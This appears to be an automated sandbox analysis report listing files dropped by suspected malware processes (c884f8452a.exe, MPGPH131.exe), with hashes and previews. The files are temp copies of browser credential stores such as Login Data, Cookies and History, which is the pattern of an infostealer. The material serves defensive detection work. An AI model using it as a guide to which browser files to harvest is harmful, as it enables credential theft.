                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\y69MPLSb6_5hWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidibQmh7W1i7Wir\yX7LbVUfjWEMHistory

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.7363857395593286
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Qg4i9gtH+bF+UI3iN0RSV0k3qLyj9Ho+A:9qtIkUI3iGRE3qLOo
                                                                                                                                                                                                                                      MD5:D10634E34CE24D7E45EEC3D4E6A53D23
                                                                                                                                                                                                                                      SHA1:4055556257F379571D93F669B1E20EE06D45E86A
                                                                                                                                                                                                                                      SHA-256:272B3B7D55B02541C0E683F09CF47349B26A80FB27B01D060D86DFEAF8DC86D5
                                                                                                                                                                                                                                      SHA-512:3B7FFB113272E0DC0D3E55F1E53A09E5613FA3DFE5D9BDA41CE0F5FECDCB3731742F0EC7B012E5CEFE7B7F1823754CA819802F75337C792DEFCECD2E3BD376F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\3zhBGt1ZSpXxLogin Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\7shck7EoU5zbHistory

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\8WKYni7vc7xbWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\AJ0N6EDplfFwWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\DJvHBWhRDG4bWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\E8Idl7q7BQr3History

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.7363857395593286
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Qg4i9gtH+bF+UI3iN0RSV0k3qLyj9Ho+A:9qtIkUI3iGRE3qLOo
                                                                                                                                                                                                                                      MD5:D10634E34CE24D7E45EEC3D4E6A53D23
                                                                                                                                                                                                                                      SHA1:4055556257F379571D93F669B1E20EE06D45E86A
                                                                                                                                                                                                                                      SHA-256:272B3B7D55B02541C0E683F09CF47349B26A80FB27B01D060D86DFEAF8DC86D5
                                                                                                                                                                                                                                      SHA-512:3B7FFB113272E0DC0D3E55F1E53A09E5613FA3DFE5D9BDA41CE0F5FECDCB3731742F0EC7B012E5CEFE7B7F1823754CA819802F75337C792DEFCECD2E3BD376F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\GqGnAaGZuEf0Login Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\HeGmTnwee70CHistory

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.7363857395593286
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Qg4i9gtH+bF+UI3iN0RSV0k3qLyj9Ho+A:9qtIkUI3iGRE3qLOo
                                                                                                                                                                                                                                      MD5:D10634E34CE24D7E45EEC3D4E6A53D23
                                                                                                                                                                                                                                      SHA1:4055556257F379571D93F669B1E20EE06D45E86A
                                                                                                                                                                                                                                      SHA-256:272B3B7D55B02541C0E683F09CF47349B26A80FB27B01D060D86DFEAF8DC86D5
                                                                                                                                                                                                                                      SHA-512:3B7FFB113272E0DC0D3E55F1E53A09E5613FA3DFE5D9BDA41CE0F5FECDCB3731742F0EC7B012E5CEFE7B7F1823754CA819802F75337C792DEFCECD2E3BD376F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\WdcFI5q9u2RhHistory

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\ko3hkXjvgbJyWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\qHlUA7t2UnGlLogin Data For Account

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\rtwegp_kThPbCookies

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\heidivqkoBMIvF7c3\t2bArKp9JT0dWeb Data

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
